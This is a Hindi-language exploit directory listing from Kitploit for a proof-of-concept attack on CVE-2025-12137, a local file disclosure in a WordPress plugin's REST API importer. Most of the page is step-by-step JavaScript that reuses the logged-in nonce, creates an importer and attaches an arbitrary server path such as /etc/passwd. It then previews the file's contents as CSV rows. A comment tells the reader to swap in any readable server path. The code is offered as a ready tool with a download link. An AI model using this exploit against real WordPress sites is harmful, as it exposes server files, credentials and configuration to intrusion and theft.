Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-12137 — प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो CVE-2025-12137 का उपयोग करके WordPress प्लगइन के REST API इम्पोर्टर एंडपॉइंट के माध्यम से स्थानीय फ़ाइल प्रकटीकरण प्रदर्शित करता है। इसमें चरण-दर-चरण JavaScript कोड शामिल है जो मनमानी सर्वर फ़ाइलों को संलग्न, प्रसंस्करण और पूर्वावलोकन करने के लिए है। | Kitploit
उपकरण/GitHubGitHub/jfriedli/cve-2025-12137
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणडेटा निष्कासनजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubjfriedli/cve-2025-12137

CVE-2025-12137

रिपॉजिटरी देखें
25 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो CVE-2025-12137 का उपयोग करके WordPress प्लगइन के REST API इम्पोर्टर एंडपॉइंट के माध्यम से स्थानीय फ़ाइल प्रकटीकरण प्रदर्शित करता है। इसमें चरण-दर-चरण JavaScript कोड शामिल है जो मनमानी सर्वर फ़ाइलों को संलग्न, प्रसंस्करण और पूर्वावलोकन करने के लिए है।

साझा करें

1) प्लगइन के REST API को वर्तमान nonce के साथ कॉल करने का सहायक फ़ंक्शन

root@kitploit:~
async function iwpFetch(path, method='GET', body) {
  const nonce = window?.wpApiSettings?.nonce || jQuery?.ajaxSettings?.headers?.['X-WP-Nonce'];
  const res = await fetch(`${location.origin}/wordpress/wp-json/iwp/v1${path}`, {
    method,
    headers: { 'Content-Type':'application/json', 'X-WP-Nonce': nonce },
    body: body ? JSON.stringify(body) : undefined,
    credentials: 'same-origin'
  });
  const text = await res.text();
  try { return JSON.parse(text); } catch { return { status: res.ok ? 'S':'E', data: text }; }
}

2) एक नया इम्पोर्टर बनाएं

root@kitploit:~
const created = await iwpFetch('/importer', 'POST', { name: 'PoC Local File Disclosure' });
const IID = created?.data?.id;

console.log('Importer created', created);

if (!IID) throw new Error('Failed to create importer');

3) सर्वर से किसी भी स्थानीय फ़ाइल को संलग्न करें

(उदाहरण: Linux पर /etc/passwd)

root@kitploit:~
// Tell the server we’re “attaching” a local file path
const attach = await fetch(`${location.origin}/wordpress/wp-json/iwp/v1/importer/${IID}/upload`, {
  method: 'POST',
  headers: {
    'X-WP-Nonce': (window?.wpApiSettings?.nonce || jQuery?.ajaxSettings?.headers?.['X-WP-Nonce']),
  },
  body: new URLSearchParams({
    action: 'file_local',
    local_url: '/etc/passwd',     // replace with any readable server path
    filetype: 'csv'               // forces CSV pipeline so preview returns raw lines
  }),
  credentials: 'same-origin'
}).then(r => r.json());

console.log('Local file attached', attach);

4) कॉन्फ़िग/काउंट आरंभ करने के लिए “CSV” को प्रोसेस करें (पुनः चलाना सुरक्षित)

root@kitploit:~
const processed = await iwpFetch(`/importer/${IID}/file-process`, 'POST', {
  delimiter: ',', enclosure: '"', escape: '\\'
});

console.log('File processed', processed);

5) CSV पूर्वावलोकन एंडपॉइंट के माध्यम से फ़ाइल सामग्री का पूर्वावलोकन करें

root@kitploit:~
const row0 = await iwpFetch(`/importer/${IID}/file-preview`, 'POST', {
  record: 0,
  delimiter: ',',
  enclosure: '"',
  escape: '\\',
  show_headings: 'false'
});

console.log('Row 0', row0);

const row1 = await iwpFetch(`/importer/${IID}/file-preview`, 'POST', {
  record: 1,
  delimiter: ',',
  enclosure: '"',
  escape: '\\',
  show_headings: 'false'
});

console.log('Row 1', row1);

// Expected:
// row0 / row1 arrays contain split fields from /etc/passwd, e.g.:
// row0.data.row → ["root","x","0","0","root","/root","/usr/bin/zsh"]
टूल डाउनलोड करें